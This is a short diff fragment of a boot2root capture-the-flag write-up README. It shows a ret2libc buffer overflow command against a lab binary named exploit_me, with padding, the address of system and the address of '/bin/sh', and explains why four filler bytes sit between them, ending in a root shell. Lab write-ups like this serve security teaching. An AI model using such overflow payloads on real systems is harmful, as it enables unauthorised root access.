mirsella/boot2root/writeup1/readme.md

 ./exploit_me $(python -c 'print "i"*140 + "\x60\xb0\xe6\xb7" + "i"*4 + "\x58\xcc\xf8\xb7"')
 ```

-the four spacer between the address of `system` and the address of `/bin/sh` is to fill the 4 bytes corresponding to the return address of the new stack frame created for system. the argument to a function is right after.
+the four bytes between the address of `system` and the address of `/bin/sh` is to fill the 4 bytes corresponding to the return address of the new stack frame created for system. the argument of the stack frame are right after.

 running our exploit and we are root !